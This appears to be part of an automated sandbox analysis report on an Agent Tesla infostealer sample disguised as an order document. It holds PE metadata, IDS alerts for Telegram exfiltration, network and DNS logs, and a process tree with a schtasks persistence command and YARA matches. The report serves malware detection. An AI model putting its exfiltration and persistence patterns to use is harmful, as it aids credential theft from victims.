                                                      .rsrc0xd80000x5b40x600False0.421875data4.115880835857526IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .reloc0xda0000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                      NameRVASizeTypeLanguageCountry
                                                      RT_VERSION0xd80900x324data
                                                      RT_MANIFEST0xd83c40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                      DLLImport
                                                      mscoree.dll_CorExeMain
                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                      192.168.2.4149.154.167.220496964432851779 12/09/22-10:19:40.984166TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49696443192.168.2.4149.154.167.220
                                                      192.168.2.4149.154.167.220496984432851779 12/09/22-10:20:17.013980TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49698443192.168.2.4149.154.167.220
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Dec 9, 2022 10:19:22.698903084 CET49695443192.168.2.43.232.242.170
                                                      Dec 9, 2022 10:19:22.698968887 CET443496953.232.242.170192.168.2.4
                                                      Dec 9, 2022 10:19:22.699067116 CET49695443192.168.2.43.232.242.170
                                                      Dec 9, 2022 10:19:22.772326946 CET49695443192.168.2.43.232.242.170
                                                      Dec 9, 2022 10:19:22.772398949 CET443496953.232.242.170192.168.2.4
                                                      Dec 9, 2022 10:19:23.034101963 CET443496953.232.242.170192.168.2.4
                                                      Dec 9, 2022 10:19:23.034198046 CET49695443192.168.2.43.232.242.170
                                                      Dec 9, 2022 10:19:23.039324045 CET49695443192.168.2.43.232.242.170
                                                      Dec 9, 2022 10:19:23.039352894 CET443496953.232.242.170192.168.2.4
                                                      Dec 9, 2022 10:19:23.039694071 CET443496953.232.242.170192.168.2.4
                                                      Dec 9, 2022 10:19:23.219844103 CET49695443192.168.2.43.232.242.170
                                                      Dec 9, 2022 10:19:24.152493000 CET49695443192.168.2.43.232.242.170
                                                      Dec 9, 2022 10:19:24.152535915 CET443496953.232.242.170192.168.2.4
                                                      Dec 9, 2022 10:19:24.271603107 CET443496953.232.242.170192.168.2.4
                                                      Dec 9, 2022 10:19:24.271747112 CET443496953.232.242.170192.168.2.4
                                                      Dec 9, 2022 10:19:24.271814108 CET49695443192.168.2.43.232.242.170
                                                      Dec 9, 2022 10:19:24.275346994 CET49695443192.168.2.43.232.242.170
                                                      Dec 9, 2022 10:19:40.860681057 CET49696443192.168.2.4149.154.167.220
                                                      Dec 9, 2022 10:19:40.860760927 CET44349696149.154.167.220192.168.2.4
                                                      Dec 9, 2022 10:19:40.860915899 CET49696443192.168.2.4149.154.167.220
                                                      Dec 9, 2022 10:19:40.861772060 CET49696443192.168.2.4149.154.167.220
                                                      Dec 9, 2022 10:19:40.861812115 CET44349696149.154.167.220192.168.2.4
                                                      Dec 9, 2022 10:19:40.937942982 CET44349696149.154.167.220192.168.2.4
                                                      Dec 9, 2022 10:19:40.938097954 CET49696443192.168.2.4149.154.167.220
                                                      Dec 9, 2022 10:19:40.942301035 CET49696443192.168.2.4149.154.167.220
                                                      Dec 9, 2022 10:19:40.942333937 CET44349696149.154.167.220192.168.2.4
                                                      Dec 9, 2022 10:19:40.942708969 CET44349696149.154.167.220192.168.2.4
                                                      Dec 9, 2022 10:19:40.944998980 CET49696443192.168.2.4149.154.167.220
                                                      Dec 9, 2022 10:19:40.945044041 CET44349696149.154.167.220192.168.2.4
                                                      Dec 9, 2022 10:19:40.980653048 CET44349696149.154.167.220192.168.2.4
                                                      Dec 9, 2022 10:19:40.983958960 CET49696443192.168.2.4149.154.167.220
                                                      Dec 9, 2022 10:19:40.984009981 CET44349696149.154.167.220192.168.2.4
                                                      Dec 9, 2022 10:19:41.150307894 CET44349696149.154.167.220192.168.2.4
                                                      Dec 9, 2022 10:19:41.150484085 CET44349696149.154.167.220192.168.2.4
                                                      Dec 9, 2022 10:19:41.150557995 CET49696443192.168.2.4149.154.167.220
                                                      Dec 9, 2022 10:19:41.150974035 CET49696443192.168.2.4149.154.167.220
                                                      Dec 9, 2022 10:19:53.055398941 CET49697443192.168.2.454.91.59.199
                                                      Dec 9, 2022 10:19:53.055483103 CET4434969754.91.59.199192.168.2.4
                                                      Dec 9, 2022 10:19:53.055583954 CET49697443192.168.2.454.91.59.199
                                                      Dec 9, 2022 10:19:53.072854996 CET49697443192.168.2.454.91.59.199
                                                      Dec 9, 2022 10:19:53.072901011 CET4434969754.91.59.199192.168.2.4
                                                      Dec 9, 2022 10:19:53.324731112 CET4434969754.91.59.199192.168.2.4
                                                      Dec 9, 2022 10:19:53.324889898 CET49697443192.168.2.454.91.59.199
                                                      Dec 9, 2022 10:19:53.327763081 CET49697443192.168.2.454.91.59.199
                                                      Dec 9, 2022 10:19:53.327800989 CET4434969754.91.59.199192.168.2.4
                                                      Dec 9, 2022 10:19:53.328203917 CET4434969754.91.59.199192.168.2.4
                                                      Dec 9, 2022 10:19:53.534943104 CET4434969754.91.59.199192.168.2.4
                                                      Dec 9, 2022 10:19:53.535114050 CET49697443192.168.2.454.91.59.199
                                                      Dec 9, 2022 10:19:53.805990934 CET49697443192.168.2.454.91.59.199
                                                      Dec 9, 2022 10:19:53.806211948 CET4434969754.91.59.199192.168.2.4
                                                      Dec 9, 2022 10:19:53.927993059 CET4434969754.91.59.199192.168.2.4
                                                      Dec 9, 2022 10:19:53.928147078 CET4434969754.91.59.199192.168.2.4
                                                      Dec 9, 2022 10:19:53.928283930 CET49697443192.168.2.454.91.59.199
                                                      Dec 9, 2022 10:19:53.929414034 CET49697443192.168.2.454.91.59.199
                                                      Dec 9, 2022 10:20:16.890120983 CET49698443192.168.2.4149.154.167.220
                                                      Dec 9, 2022 10:20:16.890194893 CET44349698149.154.167.220192.168.2.4
                                                      Dec 9, 2022 10:20:16.890625954 CET49698443192.168.2.4149.154.167.220
                                                      Dec 9, 2022 10:20:16.891558886 CET49698443192.168.2.4149.154.167.220
                                                      Dec 9, 2022 10:20:16.891596079 CET44349698149.154.167.220192.168.2.4
                                                      Dec 9, 2022 10:20:16.961730957 CET44349698149.154.167.220192.168.2.4
                                                      Dec 9, 2022 10:20:16.962007999 CET49698443192.168.2.4149.154.167.220
                                                      Dec 9, 2022 10:20:16.966172934 CET49698443192.168.2.4149.154.167.220
                                                      Dec 9, 2022 10:20:16.966219902 CET44349698149.154.167.220192.168.2.4
                                                      Dec 9, 2022 10:20:16.966680050 CET44349698149.154.167.220192.168.2.4
                                                      Dec 9, 2022 10:20:16.969074011 CET49698443192.168.2.4149.154.167.220
                                                      Dec 9, 2022 10:20:16.969122887 CET44349698149.154.167.220192.168.2.4
                                                      Dec 9, 2022 10:20:17.013200998 CET44349698149.154.167.220192.168.2.4
                                                      Dec 9, 2022 10:20:17.013797998 CET49698443192.168.2.4149.154.167.220
                                                      Dec 9, 2022 10:20:17.013845921 CET44349698149.154.167.220192.168.2.4
                                                      Dec 9, 2022 10:20:17.194960117 CET44349698149.154.167.220192.168.2.4
                                                      Dec 9, 2022 10:20:17.195230007 CET44349698149.154.167.220192.168.2.4
                                                      Dec 9, 2022 10:20:17.195997000 CET49698443192.168.2.4149.154.167.220
                                                      Dec 9, 2022 10:20:17.196050882 CET44349698149.154.167.220192.168.2.4
                                                      Dec 9, 2022 10:20:17.196135044 CET49698443192.168.2.4149.154.167.220
                                                      Dec 9, 2022 10:20:17.196135044 CET49698443192.168.2.4149.154.167.220
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Dec 9, 2022 10:19:22.594918013 CET5657253192.168.2.48.8.8.8
                                                      Dec 9, 2022 10:19:22.613454103 CET53565728.8.8.8192.168.2.4
                                                      Dec 9, 2022 10:19:22.628007889 CET5091153192.168.2.48.8.8.8
                                                      Dec 9, 2022 10:19:22.646457911 CET53509118.8.8.8192.168.2.4
                                                      Dec 9, 2022 10:19:40.828479052 CET5968353192.168.2.48.8.8.8
                                                      Dec 9, 2022 10:19:40.847109079 CET53596838.8.8.8192.168.2.4
                                                      Dec 9, 2022 10:19:52.963900089 CET6416753192.168.2.48.8.8.8
                                                      Dec 9, 2022 10:19:52.980617046 CET53641678.8.8.8192.168.2.4
                                                      Dec 9, 2022 10:19:53.015748024 CET5856553192.168.2.48.8.8.8
                                                      Dec 9, 2022 10:19:53.034867048 CET53585658.8.8.8192.168.2.4
                                                      Dec 9, 2022 10:20:16.871406078 CET5223953192.168.2.48.8.8.8
                                                      Dec 9, 2022 10:20:16.888513088 CET53522398.8.8.8192.168.2.4
                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Dec 9, 2022 10:19:22.594918013 CET192.168.2.48.8.8.80xcdbbStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                      Dec 9, 2022 10:19:22.628007889 CET192.168.2.48.8.8.80x39c2Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                      Dec 9, 2022 10:19:40.828479052 CET192.168.2.48.8.8.80xc143Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                      Dec 9, 2022 10:19:52.963900089 CET192.168.2.48.8.8.80xaabbStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                      Dec 9, 2022 10:19:53.015748024 CET192.168.2.48.8.8.80x1a60Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                      Dec 9, 2022 10:20:16.871406078 CET192.168.2.48.8.8.80x7dfStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Dec 9, 2022 10:19:22.613454103 CET8.8.8.8192.168.2.40xcdbbNo error (0)api.ipify.orgapi.ipify.org.herokudns.comCNAME (Canonical name)IN (0x0001)false
                                                      Dec 9, 2022 10:19:22.613454103 CET8.8.8.8192.168.2.40xcdbbNo error (0)api.ipify.org.herokudns.com3.232.242.170A (IP address)IN (0x0001)false
                                                      Dec 9, 2022 10:19:22.613454103 CET8.8.8.8192.168.2.40xcdbbNo error (0)api.ipify.org.herokudns.com52.20.78.240A (IP address)IN (0x0001)false
                                                      Dec 9, 2022 10:19:22.613454103 CET8.8.8.8192.168.2.40xcdbbNo error (0)api.ipify.org.herokudns.com3.220.57.224A (IP address)IN (0x0001)false
                                                      Dec 9, 2022 10:19:22.613454103 CET8.8.8.8192.168.2.40xcdbbNo error (0)api.ipify.org.herokudns.com54.91.59.199A (IP address)IN (0x0001)false
                                                      Dec 9, 2022 10:19:22.646457911 CET8.8.8.8192.168.2.40x39c2No error (0)api.ipify.orgapi.ipify.org.herokudns.comCNAME (Canonical name)IN (0x0001)false
                                                      Dec 9, 2022 10:19:22.646457911 CET8.8.8.8192.168.2.40x39c2No error (0)api.ipify.org.herokudns.com52.20.78.240A (IP address)IN (0x0001)false
                                                      Dec 9, 2022 10:19:22.646457911 CET8.8.8.8192.168.2.40x39c2No error (0)api.ipify.org.herokudns.com3.232.242.170A (IP address)IN (0x0001)false
                                                      Dec 9, 2022 10:19:22.646457911 CET8.8.8.8192.168.2.40x39c2No error (0)api.ipify.org.herokudns.com3.220.57.224A (IP address)IN (0x0001)false
                                                      Dec 9, 2022 10:19:22.646457911 CET8.8.8.8192.168.2.40x39c2No error (0)api.ipify.org.herokudns.com54.91.59.199A (IP address)IN (0x0001)false
                                                      Dec 9, 2022 10:19:40.847109079 CET8.8.8.8192.168.2.40xc143No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                      Dec 9, 2022 10:19:52.980617046 CET8.8.8.8192.168.2.40xaabbNo error (0)api.ipify.orgapi.ipify.org.herokudns.comCNAME (Canonical name)IN (0x0001)false
                                                      Dec 9, 2022 10:19:52.980617046 CET8.8.8.8192.168.2.40xaabbNo error (0)api.ipify.org.herokudns.com54.91.59.199A (IP address)IN (0x0001)false
                                                      Dec 9, 2022 10:19:52.980617046 CET8.8.8.8192.168.2.40xaabbNo error (0)api.ipify.org.herokudns.com3.220.57.224A (IP address)IN (0x0001)false
                                                      Dec 9, 2022 10:19:52.980617046 CET8.8.8.8192.168.2.40xaabbNo error (0)api.ipify.org.herokudns.com3.232.242.170A (IP address)IN (0x0001)false
                                                      Dec 9, 2022 10:19:52.980617046 CET8.8.8.8192.168.2.40xaabbNo error (0)api.ipify.org.herokudns.com52.20.78.240A (IP address)IN (0x0001)false
                                                      Dec 9, 2022 10:19:53.034867048 CET8.8.8.8192.168.2.40x1a60No error (0)api.ipify.orgapi.ipify.org.herokudns.comCNAME (Canonical name)IN (0x0001)false
                                                      Dec 9, 2022 10:19:53.034867048 CET8.8.8.8192.168.2.40x1a60No error (0)api.ipify.org.herokudns.com3.220.57.224A (IP address)IN (0x0001)false
                                                      Dec 9, 2022 10:19:53.034867048 CET8.8.8.8192.168.2.40x1a60No error (0)api.ipify.org.herokudns.com54.91.59.199A (IP address)IN (0x0001)false
                                                      Dec 9, 2022 10:19:53.034867048 CET8.8.8.8192.168.2.40x1a60No error (0)api.ipify.org.herokudns.com3.232.242.170A (IP address)IN (0x0001)false
                                                      Dec 9, 2022 10:19:53.034867048 CET8.8.8.8192.168.2.40x1a60No error (0)api.ipify.org.herokudns.com52.20.78.240A (IP address)IN (0x0001)false
                                                      Dec 9, 2022 10:20:16.888513088 CET8.8.8.8192.168.2.40x7dfNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                      • api.ipify.org
                                                      • api.telegram.org

                                                      Click to jump to process

                                                      Target ID:0
                                                      Start time:10:18:58
                                                      Start date:09/12/2022
                                                      Path:C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe
                                                      Imagebase:0xb20000
                                                      File size:873472 bytes
                                                      MD5 hash:19081EF2A08F678A3203B29124043C41
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Yara matches:
                                                      • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000000.00000002.343033622.0000000003FC9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                      Reputation:low

                                                      Target ID:1
                                                      Start time:10:19:15
                                                      Start date:09/12/2022
                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WsdnBq" /XML "C:\Users\user\AppData\Local\Temp\tmpF47D.tmp
                                                      Imagebase:0x10b0000
                                                      File size:185856 bytes
                                                      MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Target ID:2
                                                      Start time:10:19:15
                                                      Start date:09/12/2022
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7c72c0000
                                                      File size:625664 bytes
                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Target ID:3
                                                      Start time:10:19:16
                                                      Start date:09/12/2022
                                                      Path:C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:{path}
                                                      Imagebase:0x320000
                                                      File size:873472 bytes
                                                      MD5 hash:19081EF2A08F678A3203B29124043C41
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low

                                                      Target ID:4
                                                      Start time:10:19:16
                                                      Start date:09/12/2022
                                                      Path:C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:{path}
                                                      Imagebase:0x860000
                                                      File size:873472 bytes
                                                      MD5 hash:19081EF2A08F678A3203B29124043C41
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Yara matches:
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.565934222.0000000002C20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000004.00000000.334155357.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                      Reputation:low

                                                      Target ID:5
                                                      Start time:10:19:17
                                                      Start date:09/12/2022
                                                      Path:C:\Users\user\AppData\Roaming\WsdnBq.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\AppData\Roaming\WsdnBq.exe
                                                      Imagebase:0x8f0000
                                                      File size:873472 bytes
                                                      MD5 hash:19081EF2A08F678A3203B29124043C41
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:.Net C# or VB.NET
                                                      Antivirus matches:
                                                      • Detection: 100%, Joe Sandbox ML
                                                      • Detection: 31%, ReversingLabs
                                                      Reputation:low

                                                      Target ID:6
                                                      Start time:10:19:43
                                                      Start date:09/12/2022
                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WsdnBq" /XML "C:\Users\user\AppData\Local\Temp\tmp645E.tmp
                                                      Imagebase:0x10b0000
                                                      File size:185856 bytes
                                                      MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Target ID:7
                                                      Start time:10:19:43
                                                      Start date:09/12/2022
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7c72c0000
                                                      File size:625664 bytes
                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Target ID:8
                                                      Start time:10:19:44
                                                      Start date:09/12/2022
                                                      Path:C:\Users\user\AppData\Roaming\WsdnBq.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:{path}
                                                      Imagebase:0xeb0000
                                                      File size:873472 bytes
                                                      MD5 hash:19081EF2A08F678A3203B29124043C41
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:.Net C# or VB.NET
                                                      Yara matches:
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.566251641.00000000032BF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:low

                                                      No disassembly